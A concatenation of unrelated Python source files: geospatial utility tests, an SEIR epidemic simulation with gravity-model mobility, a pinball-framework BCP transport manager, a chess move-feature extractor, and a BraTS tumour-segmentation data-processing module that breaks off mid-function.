        gdb_path = task_utils.get_geodatabase_path(r'c:\testdata\gdb1.gdb\fds\tablename')
        self.assertEqual(gdb_path, r'c:\testdata\gdb1.gdb')

    def test_get_unique_strings(self):
        """Test get unique strings from a list of strings"""
        tags = ['TEST', 'test', 'Test', 'TESTER', 'tester', 'Tester', 'VOYAGER']
        unique_strings = task_utils.get_unique_strings(tags)
        self.assertEqual(sorted(unique_strings), ['TEST', 'TESTER', 'VOYAGER'])

    def test_dd_to_dms(self):
        """Test converting decimal degrees to degrees minutes seconds"""
        import arcpy  # imported here so the rest of the suite runs without arcpy
        dms = task_utils.dd_to_dms(-56.553191)
        self.assertEqual(dms, (56, 33, 11.49))

    def test_from_wkt_to_polygon(self):
        """Test converting WKT to a polygon object"""
        poly = task_utils.from_wkt('POLYGON ((-180 -90, -180 90, 180 90, 180 -90, -180 -90))', 4326)
        extent_min = ('{0:.1f}'.format(poly.extent.XMax), '{0:.1f}'.format(poly.extent.YMax))
        self.assertEqual(extent_min, ('180.0', '90.0'))

    def test_get_spatial_reference(self):
        """Test getting a spatial reference from SR code"""
        sr = task_utils.get_spatial_reference(4326)
        self.assertEqual(sr.name, 'GCS_WGS_1984')

    def test_get_projection_file(self):
        """Test get the projection file name from SR code"""
        pf = task_utils.get_projection_file(4326)
        self.assertEqual(os.path.basename(pf), 'WGS 1984.prj')

    def test_get_clip_region(self):
        """Test getting a clip region from WKT"""
        wkt = 'MULTIPOLYGON (((-75.759298375698563 41.391337611891402, -75.759298375698563 49.022078452247342, -92.303148066299968 49.022078452247342, -92.303148066299968 41.391337611891402, -75.759298375698563 41.391337611891402)))'
        clip_region = task_utils.get_clip_region(wkt, 3857)
        extent_min = ('{0:.1f}'.format(clip_region.XMax), '{0:.1f}'.format(clip_region.YMax))
        self.assertEqual(extent_min, ('-8433486.5', '6278608.5'))

    def test_get_local_date(self):
        """Test gettting local date"""
        ld = task_utils.get_local_date()
        self.assertIsNotNone(ld)

    def test_zip_data(self):
        """Test zipping a folder"""
        import tempfile
        import shutil
        temp = tempfile.mkdtemp()
        zf = task_utils.zip_data(temp, 'test.zip')
        self.assertTrue(zf.endswith('.zip'))
        shutil.rmtree(temp)
|
<filename>india/COVID_Model.py
import numpy as np
from math import sqrt, floor, exp
import copy
import matplotlib.pyplot as plt
class City:
    """Grid-of-blocks SEIR epidemic model with gravity-model mobility.

    The city is an L x L grid of ``units`` blocks (``units`` must be a
    perfect square). Each block tracks four compartments (S, E, I, R) in
    ``blocks_matrix`` (shape: units x 4). Each simulated step moves people
    between blocks (gravity model) and then runs one SEIR transmission step.
    """

    def __init__(self, opt):
        self.units_num = opt['units']
        self.L = int(sqrt(self.units_num))
        assert self.L ** 2 == self.units_num
        self.unit_dist = opt['unit_distance']  # physical distance of each unit block
        # Init disease params
        self.disease_params = dict()
        self.disease_params['Pi'] = opt['Pi']  # transmission rate of I
        self.disease_params['Pe'] = opt['Pe']  # transmission rate of E
        self.disease_params['PE'] = opt['PE']  # probability of a healthy person to be E when infected
        self.disease_params['e_to_i'] = opt['e_to_i']  # probability that an E turns to I
        self.disease_params['i_to_r'] = opt['i_to_r']  # recover rate of I
        # Init policy params
        self.policy_params = dict()
        self.policy_params['mobility'] = opt['mobility']  # mobility rate of gravity model
        self.policy_params['self_quarantine'] = opt['self_quarantine']  # self quarantine of S
        self.policy_params['ki_discount'] = opt['ki_disc']  # discount of I when moving
        self.policy_params['ke_discount'] = opt['ke_disc']  # discount of E when moving
        self.policy_params['P_i_discount'] = opt['Pi_disc']  # discount of transmission rate of I
        self.policy_params['P_e_discount'] = opt['Pe_disc']  # discount of transmission rate of E
        self.policy_params['early_detect'] = opt['early_detect']  # early detect rate (accelerates I to R)
        if 'cases_bias' in opt:
            self.cases_bias = opt['cases_bias']
        if 'init_cases_num' in opt:
            self.init_cases_num = opt['init_cases_num']
        # Blocks for the SEIR model: one row per unit, columns are S, E, I, R.
        self.blocks_matrix = np.zeros((self.units_num, 4))
        # Precompute the pairwise distance-decay matrix used by the gravity
        # model (Manhattan grid distance; 82 is presumably a decay scale in
        # the same units as unit_distance — TODO confirm source).
        self.dist_matrix = np.ones((self.units_num, self.units_num))
        for i in range(self.units_num):
            for j in range(self.units_num):
                if i != j:
                    x_i = int(floor(i / self.L))
                    y_i = int(floor(i % self.L))
                    x_j = int(floor(j / self.L))
                    y_j = int(floor(j % self.L))
                    self.dist_matrix[i, j] = exp((abs(x_i - x_j) + abs(y_i - y_j)) * self.unit_dist / 82)

    def setPopCases(self, pop, cases):
        """Store per-block population and the observed cumulative case curve."""
        pop_cp = copy.deepcopy(pop)
        cases_copy = copy.deepcopy(cases)
        cases_copy = cases_copy.reshape(-1)
        self.pop = pop_cp.astype(int)
        self.cases = cases_copy.astype(int)
        self.max_pop = int(pop_cp.max() * 1.2)

    def get_blk_pop(self):
        """Return current total population per block (S+E+I+R), shape (units,)."""
        return self.blocks_matrix.sum(axis=1).reshape(-1)

    def fit(self, pi, early_detect, mobility):
        """Objective for calibration: negative squared error between the
        simulated cumulative case curve and the observed one.

        Resets the blocks from self.pop before simulating.
        """
        self.disease_params['Pi'] = float(pi)
        self.disease_params['Pe'] = float(pi)
        self.policy_params['early_detect'] = float(early_detect)
        self.policy_params['mobility'] = float(mobility)
        self.blocks_matrix = np.zeros((self.units_num, 4))
        self.init_blocks(self.pop, manual_init_case=True)
        cases_cp = copy.deepcopy(self.cases)
        S, E, I, R, new_spread = self.begin_simulate(len(cases_cp), fit=True)
        new_spread = new_spread.cumsum()
        new_spread = new_spread.reshape(-1)
        diff = -np.square(new_spread + self.cases_bias - cases_cp).sum()
        assert ~np.isnan(diff)
        print(diff)
        return diff

    def fit_second(self, pi, early_detect, mobility):
        """Same objective as fit(), but resumes from the saved checkpoint
        (see make_check_point) instead of a fresh initialization, adding the
        checkpoint's cumulative infections to the simulated curve.
        """
        self.disease_params['Pi'] = float(pi)
        self.disease_params['Pe'] = float(pi)
        self.policy_params['early_detect'] = float(early_detect)
        self.policy_params['mobility'] = float(mobility)
        self.blocks_matrix = np.zeros((self.units_num, 4))
        self.init_blocks(self.pop, ckpt=True)
        cases_cp = copy.deepcopy(self.cases)
        S, E, I, R, new_spread = self.begin_simulate(len(cases_cp), fit=True)
        new_spread = new_spread.cumsum()
        new_spread = new_spread.reshape(-1)
        new_spread += self.ckpt['total_infect']
        diff = -np.square(new_spread + self.cases_bias - cases_cp).sum()
        assert ~np.isnan(diff)
        print(diff)
        return diff

    def init_blocks(self, population, ckpt=False, manual_init_case=False):
        """Initialize blocks_matrix.

        If ckpt is False, every block starts fully susceptible and the
        ``init_cases_num`` most populated blocks each get one I case.
        If ckpt is True, restore the state saved by make_check_point().
        """
        if not ckpt:
            pop_copy = copy.deepcopy(population)
            # Seed the initial cases in the largest blocks.
            init_case_index = np.argsort(pop_copy.reshape(-1))[-self.init_cases_num:]
            self.max_pop = int(pop_copy.max() * 1.2)
            for idx in range(self.units_num):
                if idx in init_case_index:
                    self.blocks_matrix[idx, 0] = pop_copy[idx]  # S
                    self.blocks_matrix[idx, 2] = 1  # I
                else:
                    self.blocks_matrix[idx, 0] = pop_copy[idx]  # S
        else:
            self.blocks_matrix = copy.deepcopy(self.ckpt['data'])

    def move(self, fit=True):
        """Move individuals between blocks according to the gravity model.

        Flows are proportional to pop_i^0.46 * pop_j^0.64 / dist(i, j),
        scaled by the mobility parameter, capped so no block sends out more
        people than it has, and rounded so E/I movers are whole people.

        returns:
            None when fit is True; otherwise the spectral radius (largest
            absolute eigenvalue) of the flow matrix, used as a mobility
            diagnostic.
        """
        pop_vec = self.get_blk_pop()  # unit_num x 1
        assert pop_vec.min() >= 0
        pop_vec_cp = copy.deepcopy(pop_vec).reshape(-1, 1).tolist()
        move_matrix = self.policy_params['mobility'] * (np.power(pop_vec_cp, 0.46).reshape(-1, 1) * np.power(pop_vec_cp, 0.64).T)
        move_matrix = move_matrix / self.dist_matrix
        for i in range(move_matrix.shape[0]):
            move_matrix[i, i] = 0
        # Cap outflow so a block never sends out more people than it holds.
        pop = self.blocks_matrix.sum(axis=1)
        out_num = move_matrix.sum(axis=1)
        violate_index = out_num > pop
        if violate_index.sum() > 0:
            move_matrix[violate_index, :] = move_matrix[violate_index, :] / out_num[violate_index].reshape(-1, 1) * pop[violate_index].reshape(-1, 1)
        # Split each flow across compartments proportionally to block makeup.
        proportion = self.blocks_matrix / self.blocks_matrix.sum(axis=1, keepdims=True)
        proportion[np.isnan(proportion)] = 0
        move_with_proportion = np.expand_dims(move_matrix, 2) * np.expand_dims(proportion, 1)
        move_out = np.floor(move_with_proportion.sum(axis=1))
        # Round E and I movers up to whole people, assigning them to the
        # destinations with the largest fractional flows first.
        move_out_E_index = np.argsort(move_with_proportion[:, :, 1], axis=1)[:, ::-1]
        move_out_I_index = np.argsort(move_with_proportion[:, :, 2], axis=1)[:, ::-1]
        for i in range(move_with_proportion.shape[0]):
            j = 0
            while move_out[i, 1] > 0:
                out_num = np.ceil(move_with_proportion[i, move_out_E_index[i, j], 1])
                move_with_proportion[i, move_out_E_index[i, j], 1] = out_num
                move_out[i, 1] -= out_num
                j += 1
            move_with_proportion[i, move_out_E_index[i, j:], 1] = 0
            j = 0
            while move_out[i, 2] > 0:
                out_num = np.ceil(move_with_proportion[i, move_out_I_index[i, j], 2])
                move_with_proportion[i, move_out_I_index[i, j], 2] = out_num
                move_out[i, 2] -= out_num
                j += 1
            move_with_proportion[i, move_out_I_index[i, j:], 2] = 0
        move_out = np.floor(move_with_proportion.sum(axis=1))
        move_in = np.floor(move_with_proportion.sum(axis=0))
        move = move_in - move_out
        self.blocks_matrix = self.blocks_matrix + move
        self.blocks_matrix[self.blocks_matrix < 0] = 0
        assert np.isnan(self.blocks_matrix).sum() < 1
        if not fit:
            return np.abs(np.linalg.eigvals(move_matrix)).max()

    def spread(self):
        """Run one SEIR transmission step over all blocks.

        returns:
            total number of newly infectious people (new I plus E->I).
        """
        # Step0. Self quarantine: move a fraction of S straight to R, and
        # early-detected E/I to R. Detection below one whole person is
        # treated as zero (the np.where threshold).
        S_quarantine = self.blocks_matrix[:, 0] * self.policy_params['self_quarantine']
        self.blocks_matrix[:, 0] -= S_quarantine
        self.blocks_matrix[:, 3] += S_quarantine
        I_quarantine = np.where((self.blocks_matrix[:, 2] * self.policy_params['early_detect']) < 1, np.zeros((self.blocks_matrix.shape[0])), self.blocks_matrix[:, 2] * self.policy_params['early_detect'])
        self.blocks_matrix[:, 2] -= I_quarantine
        E_quarantine = np.where((self.blocks_matrix[:, 1] * self.policy_params['early_detect']) < 1,
                                np.zeros((self.blocks_matrix.shape[0])),
                                self.blocks_matrix[:, 1] * self.policy_params['early_detect'])
        self.blocks_matrix[:, 1] -= E_quarantine
        self.blocks_matrix[:, 3] += (I_quarantine + E_quarantine)
        # Step2. Transmission: mass-action within each block; an infection
        # count exceeding the available S is reset to 0 (overflow guard).
        S_infect = self.blocks_matrix[:, 0] * self.blocks_matrix[:, 1] * self.disease_params['Pe'] + self.blocks_matrix[:, 0] * self.blocks_matrix[:, 2] * self.disease_params['Pi']
        S_infect[S_infect > self.blocks_matrix[:, 0]] = 0
        E_new = S_infect * self.disease_params['PE']
        I_new = S_infect - E_new
        # Step3. E_to_I
        E_to_I = self.blocks_matrix[:, 1] * self.disease_params['e_to_i']
        # Step4. I_to_R
        I_to_R = self.blocks_matrix[:, 2] * self.disease_params['i_to_r']
        # Step5. Update compartments
        self.blocks_matrix[:, 0] -= S_infect
        self.blocks_matrix[:, 1] += (E_new - E_to_I)
        self.blocks_matrix[:, 2] += (I_new + E_to_I - I_to_R)
        self.blocks_matrix[:, 3] += I_to_R
        assert np.isnan(self.blocks_matrix).sum() < 1
        return (I_new + E_to_I).sum()

    def move_and_spread(self, fit=True):
        """Run one full step: mobility then transmission.

        returns:
            newly_spread when fit is True;
            (newly_spread, move_rho) when fit is False, where move_rho is
            the spectral radius of the mobility flow matrix.
        """
        if fit:
            self.move()
            return self.spread()
        # BUG FIX: the original called self.move() here (fit defaulting to
        # True), so move() returned None and move_rho was always None,
        # crashing begin_simulate(..., fit=False) on array assignment.
        move_rho = self.move(fit=False)
        newly_spread = self.spread()
        return newly_spread, move_rho

    def begin_simulate(self, iter_num, fit=True):
        """Simulate iter_num steps from the current state.

        returns:
            (S, E, I, R, new_spread) arrays of shape (1, iter_num) when fit
            is True, plus a trailing move_rho array when fit is False.
        """
        S = np.zeros((1, iter_num))
        E = np.zeros((1, iter_num))
        I = np.zeros((1, iter_num))
        R = np.zeros((1, iter_num))
        new_spread = np.zeros((1, iter_num))
        if not fit:
            move_rho = np.zeros((1, iter_num))
            for i in range(iter_num):
                S[0, i] = self.blocks_matrix[:, 0].sum()
                E[0, i] = self.blocks_matrix[:, 1].sum()
                I[0, i] = self.blocks_matrix[:, 2].sum()
                R[0, i] = self.blocks_matrix[:, 3].sum()
                new_spread[0, i], move_rho[0, i] = self.move_and_spread(fit)
            return S, E, I, R, new_spread, move_rho
        else:
            for i in range(iter_num):
                S[0, i] = self.blocks_matrix[:, 0].sum()
                E[0, i] = self.blocks_matrix[:, 1].sum()
                I[0, i] = self.blocks_matrix[:, 2].sum()
                R[0, i] = self.blocks_matrix[:, 3].sum()
                new_spread[0, i] = self.move_and_spread(fit)
            return S, E, I, R, new_spread

    def begin_simulate_multi_parted(self, opts_list, cases_list, save_path, fit=True):
        """Simulate several consecutive phases, each with its own parameters.

        Phase 0 starts from a fresh initialization; later phases resume from
        the checkpoint saved at the end of the previous phase. Plots E, I,
        the cumulative simulated curve and the observed curve to save_path.

        returns:
            the cumulative simulated case curve (with cases_bias added).
        """
        epochs = len(opts_list)
        for i in range(epochs):
            self.disease_params['Pi'] = float(opts_list[i]['Pi'])
            self.disease_params['Pe'] = float(opts_list[i]['Pi'])
            self.policy_params['early_detect'] = float(opts_list[i]['early_detect'])
            self.policy_params['mobility'] = float(opts_list[i]['mobility'])
            self.blocks_matrix = np.zeros((self.units_num, 4))
            self.init_blocks(self.pop, manual_init_case=(i == 0), ckpt=(i > 0))
            if not fit:
                S_tmp, E_tmp, I_tmp, R_tmp, new_spread_tmp, move_rho = self.begin_simulate(len(cases_list[i]), fit)
            else:
                S_tmp, E_tmp, I_tmp, R_tmp, new_spread_tmp = self.begin_simulate(len(cases_list[i]), fit)
            if i == 0:
                S = S_tmp
                E = E_tmp
                I = I_tmp
                R = R_tmp
                new_spread = new_spread_tmp
            else:
                S = np.concatenate((S, S_tmp), axis=1)
                E = np.concatenate((E, E_tmp), axis=1)
                I = np.concatenate((I, I_tmp), axis=1)
                R = np.concatenate((R, R_tmp), axis=1)
                new_spread = np.concatenate((new_spread, new_spread_tmp), axis=1)
            self.make_check_point(float(new_spread.cumsum()[-1]))
        S = S.sum(axis=0)
        E = E.sum(axis=0)
        I = I.sum(axis=0)
        R = R.sum(axis=0)
        new_spread = new_spread.cumsum().reshape(-1) + self.cases_bias
        cases_total = np.array(cases_list[0])
        for i in range(epochs - 1):
            cases_total = np.concatenate((cases_total, np.array(cases_list[i + 1])))
        # plt.plot(S, label="S")
        plt.plot(E, label="E")
        plt.plot(I, label="I")
        # plt.plot(R, label="R")
        plt.plot(new_spread, label='Total EI')
        plt.plot(cases_total, label='True')
        plt.ylabel("People")
        plt.xlabel("Step")
        plt.legend()
        plt.tight_layout()
        # NOTE(review): savefig has no figsize parameter in current
        # matplotlib; presumably harmless here — confirm against the
        # matplotlib version in use.
        plt.savefig(fname=save_path, figsize=[8, 6])
        plt.clf()
        return new_spread

    def make_check_point(self, total_infect):
        """Save the current block state and cumulative infections so a later
        phase (or fit_second) can resume from here. Note: stores a reference
        to blocks_matrix; init_blocks(ckpt=True) deep-copies on restore.
        """
        self.ckpt = {'data': self.blocks_matrix, 'total_infect': total_infect}
|
<reponame>pmansukhani/mpf
"""Classes which manage BCP transports."""
import asyncio
from typing import Union
from mpf.core.bcp.bcp_client import BaseBcpClient
MYPY = False # noqa
if MYPY:
from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import
class BcpTransportManager:
    """Manages BCP transports.

    Tracks connected BCP clients, runs a per-client receive loop on the
    machine clock's event loop, and routes outgoing commands either to all
    clients, to named clients, or to clients registered for a handler.
    """

    __slots__ = ["_machine", "_transports", "_readers", "_handlers"]

    def __init__(self, machine):
        """Initialise BCP transport manager."""
        self._machine = machine     # type: MachineController
        self._transports = []       # all connected clients
        self._readers = {}          # transport -> its receive-loop task
        self._handlers = {}         # handler name -> list of transports
        # Stop all clients cleanly when the machine shuts down.
        self._machine.events.add_handler("shutdown", self.shutdown)

    def add_handler_to_transport(self, handler, transport: BaseBcpClient):
        """Register client as handler."""
        if handler not in self._handlers:
            self._handlers[handler] = []
        if transport is None:
            raise AssertionError("Cannot register None transport.")
        self._handlers[handler].append(transport)

    def remove_transport_from_handle(self, handler, transport: BaseBcpClient):
        """Remove client from a certain handler."""
        if transport in self._handlers[handler]:
            self._handlers[handler].remove(transport)

    def get_transports_for_handler(self, handler):
        """Get clients which registered for a certain handler."""
        return self._handlers.get(handler, [])

    def register_transport(self, transport, future=None, **kwargs):
        """Register a client."""
        # future/kwargs exist so this can be used directly as a callback;
        # they are intentionally ignored.
        del future
        del kwargs
        self._transports.append(transport)
        # Start a dedicated receive loop for this transport and surface any
        # exception it raises via the done callback.
        self._readers[transport] = self._machine.clock.loop.create_task(self._receive_loop(transport))
        self._readers[transport].add_done_callback(self._done)

    @staticmethod
    def _done(future):
        """Evaluate result of task.

        Will raise exceptions from within task.
        """
        try:
            future.result()
        except asyncio.CancelledError:
            # Cancellation (e.g. unregister) is a normal way for the loop to end.
            pass

    # NOTE(review): @asyncio.coroutine / `yield from` is the pre-3.5
    # coroutine style and is deprecated (removed in Python 3.11); migrating
    # to `async def` / `await` would need a project-wide decision.
    @asyncio.coroutine
    def _receive_loop(self, transport: BaseBcpClient):
        # Read messages forever; a broken connection unregisters the client.
        while True:
            try:
                cmd, kwargs = yield from transport.read_message()
            except IOError:
                self.unregister_transport(transport)
                return
            yield from self._machine.bcp.interface.process_bcp_message(cmd, kwargs, transport)

    def unregister_transport(self, transport: BaseBcpClient):
        """Unregister client."""
        if transport in self._transports:
            self._transports.remove(transport)

        # remove transport from all handlers
        for handler in self._handlers:
            if transport in self._handlers[handler]:
                self._handlers[handler].remove(transport)

        # stop and forget the client's receive loop
        if transport in self._readers:
            self._readers[transport].cancel()
            del self._readers[transport]

        if transport.exit_on_close:
            self._machine.stop("BCP client {} disconnected and exit_on_close is set".format(transport.name))

    def get_all_clients(self):
        """Get a list of all clients."""
        return self._transports

    def get_named_client(self, client_name) -> Union[BaseBcpClient, bool]:
        """Get a client by name."""
        for client in self._transports:
            if client.name == client_name:
                return client
        # Falsy sentinel when no client matches.
        return False

    def send_to_clients(self, clients, bcp_command, **kwargs):
        """Send command to a list of clients."""
        # set() de-duplicates so a client never receives the command twice.
        for client in set(clients):
            self.send_to_client(client, bcp_command, **kwargs)

    def send_to_clients_with_handler(self, handler, bcp_command, **kwargs):
        """Send command to clients which registered for a specific handler."""
        clients = self.get_transports_for_handler(handler)
        self.send_to_clients(clients, bcp_command, **kwargs)

    def send_to_client(self, client: BaseBcpClient, bcp_command, **kwargs):
        """Send command to a specific bcp client."""
        try:
            client.send(bcp_command, kwargs)
        except IOError:
            # Connection is gone: stop and drop the client.
            client.stop()
            self.unregister_transport(client)

    def send_to_all_clients(self, bcp_command, **kwargs):
        """Send command to all bcp clients."""
        for client in self._transports:
            self.send_to_client(client, bcp_command, **kwargs)

    def shutdown(self, **kwargs):
        """Prepare the BCP clients for MPF shutdown."""
        del kwargs
        # Iterate over a copy: unregister_transport mutates self._transports.
        for client in list(self._transports):
            client.stop()
            self.unregister_transport(client)
|
<reponame>Keesiu/meta-kaggle
#!/usr/bin/env python
import json, sys, argparse
from chess import *
from chess.pgn import *
# returns "NE", "SW" etc for a move, from the players perspective
# and also the distance moved
def move_direction_and_distance(board, move):
    """Return (direction, distance) for *move* from the mover's perspective.

    direction is a compass string built from "N"/"S" and "E"/"W" ("" for a
    null displacement); distance is the Chebyshev distance in squares.
    """
    from_file = file_index(move.from_square)
    from_rank = rank_index(move.from_square)
    to_file = file_index(move.to_square)
    to_rank = rank_index(move.to_square)
    file_move = to_file - from_file
    rank_move = to_rank - from_rank
    # BUG FIX: the original consulted the global ``node`` instead of the
    # ``board`` argument, silently coupling this function to the script's
    # main loop. The side to move on *board* is what matters here.
    if board.turn == chess.BLACK:
        # Flip the frame of reference so directions are from Black's side.
        file_move = -1 * file_move
        rank_move = -1 * rank_move
    ns_letter = ""
    if rank_move > 0:
        ns_letter = "N"
    elif rank_move < 0:
        ns_letter = "S"
    ew_letter = ""
    if file_move > 0:
        ew_letter = "E"
    elif file_move < 0:
        ew_letter = "W"
    return (ns_letter + ew_letter), max(abs(file_move), abs(rank_move))
# returns a comma-separated string representing the features of this move
def features(board, move):
    """Return a comma-separated feature string for *move* played on *board*.

    Fields: piece symbol, direction, distance, is-capture, gives-check.
    A missing move yields five empty fields so the CSV column count stays
    stable.
    """
    if move is None:
        return ", ".join([""] * 5)
    direction, distance = move_direction_and_distance(board, move)
    piece_symbol = board.piece_at(move.from_square).symbol().upper()
    is_capture = board.piece_at(move.to_square) is not None
    # Play the move temporarily to see whether it gives check.
    board.push(move)
    gives_check = board.is_check()
    board.pop()
    fields = [piece_symbol, direction, str(distance),
              str(is_capture), str(gives_check)]
    return ", ".join(fields)
# Command-line driver: read engine evaluations (JSON) and games (PGN), then
# write one CSV row per half-move with features of the played move and of the
# engine's best move.
parser = argparse.ArgumentParser(description='Produce a set of features for each move in a set of games. Output goes to stdout.')
parser.add_argument('pgn', help='PGN file of games')
parser.add_argument('jsoneval', help='JSON eval of games')
parser.add_argument('outfile', help='output file')
args = parser.parse_args()

# Map game number -> list of best-move SANs (one per half-move).
best_moves = {}
print("Opening %s" % args.jsoneval)
# FIX: use context managers so the JSON/PGN/output files are always closed
# (the original leaked json_fd and game_fd).
with open(args.jsoneval, 'r') as json_fd:
    results = json.load(json_fd)
for result in results:
    game_num = int(result['event'])
    best_moves[game_num] = result['best_moves']

print("Opening %s" % args.pgn)
with open(args.pgn, 'r') as game_fd, open(args.outfile, 'w') as output_fd:
    game = read_game(game_fd)
    while game is not None:
        node = game
        movenum = 0
        game_num = int(game.headers['Event'])
        print('Doing game %i' % game_num)
        if game_num % 100 == 0:
            sys.stdout.write('.')
        # Walk the mainline, emitting one CSV row per half-move.
        while node.variations:
            next_node = node.variation(0)
            done_move = next_node.move
            best_moves_list = best_moves.get(game_num)
            if best_moves_list:
                best_move_san = best_moves_list[movenum]
                best_move = node.board().parse_san(best_move_san)
            else:
                # No evaluation for this game: emit empty best-move fields.
                best_move_san = ""
                best_move = None
            best_move_features = features(node.board(), best_move)
            done_move_features = features(node.board(), done_move)
            output_fd.write(', '.join([str(game_num),
                                       str(movenum),
                                       node.board().san(done_move),
                                       done_move_features,
                                       best_move_san,
                                       best_move_features]))
            output_fd.write('\n')
            movenum = movenum + 1
            node = next_node
        game = read_game(game_fd)
|
<filename>guotai_brats17/data_process.py
# -*- coding: utf-8 -*-
# Implementation of Wang et al 2017: Automatic Brain Tumor Segmentation using Cascaded Anisotropic Convolutional Neural Networks. https://arxiv.org/abs/1709.00382
# Author: <NAME>
# Copyright (c) 2017-2018 University College London, United Kingdom. All rights reserved.
# http://cmictig.cs.ucl.ac.uk
#
# Distributed under the BSD-3 licence. Please see the file licence.txt
# This software is not certified for clinical use.
#
import os
import nibabel
import numpy as np
import random
from scipy import ndimage
import SimpleITK as sitk
DEBUG = False
def log(s):
    """Print *s* only when the module-level DEBUG flag is enabled."""
    if not DEBUG:
        return
    print(s)
def search_file_in_folder_list(folder_list, file_name):
    """Find the full filename from a list of folders.

    inputs:
        folder_list: a list of folders to search, in order
        file_name: filename
    outputs:
        full_file_name: the full filename of the first match
    raises:
        ValueError: if file_name exists in none of the folders
    """
    for folder in folder_list:
        full_file_name = os.path.join(folder, file_name)
        if os.path.isfile(full_file_name):
            # Return on the first folder that contains the file.
            return full_file_name
    # FIX: the original message reported only the last folder searched;
    # report the whole search list instead.
    raise ValueError('{0:} is not found in {1:}'.format(file_name, folder_list))
def load_3d_volume_as_array(filename):
    """Load a 3D volume, dispatching on the file extension (.nii / .mha)."""
    if '.nii' in filename:
        return load_nifty_volume_as_array(filename)
    if '.mha' in filename:
        return load_mha_volume_as_array(filename)
    raise ValueError('{0:} unspported file format'.format(filename))
def load_mha_volume_as_array(filename):
    """Read a .mha volume with SimpleITK and return it as a numpy array."""
    image = sitk.ReadImage(filename)
    return sitk.GetArrayFromImage(image)
def load_nifty_volume_as_array(filename, with_header = False):
    """
    load nifty image into numpy array, and transpose it based on the [z,y,x] axis order
    The output array shape is like [Depth, Height, Width]
    inputs:
        filename: the input file name, should be *.nii or *.nii.gz
        with_header: return affine and header information as well
    outputs:
        data: a numpy data array (plus (affine, header) if with_header)
    """
    log(filename)
    img = nibabel.load(filename)
    # FIX: img.get_data() is deprecated and removed in recent nibabel;
    # np.asanyarray(img.dataobj) is the documented replacement that keeps
    # the on-disk dtype (unlike get_fdata, which always returns floats).
    data = np.asanyarray(img.dataobj)
    # Reorder axes from nibabel's [x, y, z] to [z, y, x].
    data = np.transpose(data, [2, 1, 0])
    if with_header:
        return data, img.affine, img.header
    return data
def save_array_as_nifty_volume(data, filename, reference_name = None):
    """Write a [Depth, Height, Width] numpy array to a nifty file.

    inputs:
        data: the numpy array to save
        filename: output file name
        reference_name: optional reference image whose affine/header
            (spatial metadata) are copied onto the output
    outputs: None
    """
    log(filename)
    img = sitk.GetImageFromArray(data)
    if reference_name is not None:
        img.CopyInformation(sitk.ReadImage(reference_name))
    sitk.WriteImage(img, filename)
def itensity_normalize_one_volume(volume):
    """Normalize an nd volume by the mean/std of its strictly positive
    (non-background) voxels; background (zero) voxels are replaced with
    standard-normal noise.

    inputs:
        volume: the input nd volume
    outputs:
        the normalized nd volume (a new array; input is not modified)
    """
    foreground = volume[volume > 0]
    normalized = (volume - foreground.mean()) / foreground.std()
    noise = np.random.normal(0, 1, size=volume.shape)
    background_mask = (volume == 0)
    normalized[background_mask] = noise[background_mask]
    return normalized
def get_ND_bounding_box(label, margin):
    """Return (idx_min, idx_max) of the non-zero region of an ND volume,
    expanded by *margin* voxels per axis and clipped to the array bounds.

    margin may be a single int (applied to every axis) or a per-axis list.
    Bounds are inclusive on both ends.
    """
    input_shape = label.shape
    if type(margin) is int:
        margin = [margin] * len(input_shape)
    assert len(input_shape) == len(margin)
    nonzero_indexes = np.nonzero(label)
    idx_min = [axis_indexes.min() for axis_indexes in nonzero_indexes]
    idx_max = [axis_indexes.max() for axis_indexes in nonzero_indexes]
    for axis in range(len(input_shape)):
        idx_min[axis] = max(idx_min[axis] - margin[axis], 0)
        idx_max[axis] = min(idx_max[axis] + margin[axis], input_shape[axis] - 1)
    return idx_min, idx_max
def crop_ND_volume_with_bounding_box(volume, min_idx, max_idx):
    """
    crop/extract a subregion from an nd image.

    inputs:
        volume: the nd array to crop
        min_idx: per-axis inclusive lower bounds
        max_idx: per-axis inclusive upper bounds
    outputs:
        the cropped subvolume

    Generalized: the original hand-wrote one branch per dimension (2-5);
    building the index ranges with np.ix_ works for any rank and is
    backward-compatible for 2-5 dimensional inputs.
    """
    assert len(min_idx) == len(max_idx) == len(volume.shape)
    ranges = [range(lo, hi + 1) for lo, hi in zip(min_idx, max_idx)]
    return volume[np.ix_(*ranges)]
def set_ND_volume_roi_with_bounding_box_range(volume, bb_min, bb_max, sub_volume):
    """
    set a subregion of an nd image (in place) and return it.

    inputs:
        volume: the nd array to write into (modified in place)
        bb_min: per-axis inclusive lower bounds
        bb_max: per-axis inclusive upper bounds
        sub_volume: values to place into the region
    outputs:
        the same array object, with the region overwritten

    Generalized: the original hand-wrote one branch per dimension (2-4);
    np.ix_ handles any rank and stays backward-compatible.
    """
    assert len(bb_min) == len(bb_max)
    out = volume
    ranges = [range(lo, hi + 1) for lo, hi in zip(bb_min, bb_max)]
    out[np.ix_(*ranges)] = sub_volume
    return out
def convert_label(in_volume, label_convert_source, label_convert_target):
    """
    Convert label values in a volume.
    inputs:
        in_volume: input nd volume with label set label_convert_source
        label_convert_source: a list of integers denoting input labels, e.g., [0, 1, 2, 4]
        label_convert_target: a list of integers denoting output labels, e.g., [0, 1, 2, 3]
    outputs:
        out_volume: the output nd volume with label set label_convert_target
    """
    changed_mask = np.zeros_like(in_volume)
    new_values = np.zeros_like(in_volume)
    for src_lab, tgt_lab in zip(label_convert_source, label_convert_target):
        # Labels that already match need no rewriting.
        if src_lab == tgt_lab:
            continue
        hit = np.asarray(in_volume == src_lab)
        changed_mask = changed_mask + hit
        new_values = new_values + tgt_lab * hit
    out_volume = in_volume * 1  # cheap copy preserving dtype
    out_volume[changed_mask > 0] = new_values[changed_mask > 0]
    return out_volume
def get_random_roi_sampling_center(input_shape, output_shape, sample_mode, bounding_box = None):
    """
    Get a random coordinate representing the center of a roi for sampling.
    inputs:
        input_shape: the shape of sampled volume
        output_shape: the desired roi shape
        sample_mode: 'valid': the entire roi should be inside the input volume
                     'full': only the roi centre should be inside the input volume
        bounding_box: the bounding box which the roi center should be limited to
    outputs:
        center: the output center coordinate of a roi
    """
    center = []
    for axis, extent in enumerate(input_shape):
        if sample_mode[axis] == 'full':
            # Center may go anywhere inside the volume / bounding box.
            if bounding_box:
                low, high = bounding_box[axis * 2], bounding_box[axis * 2 + 1]
            else:
                low, high = 0, extent
        else:
            # 'valid': shrink the range by half the roi so it fits entirely.
            half = int(output_shape[axis] / 2)
            if bounding_box:
                low = bounding_box[axis * 2] + half
                high = bounding_box[axis * 2 + 1] - half
            else:
                low = half
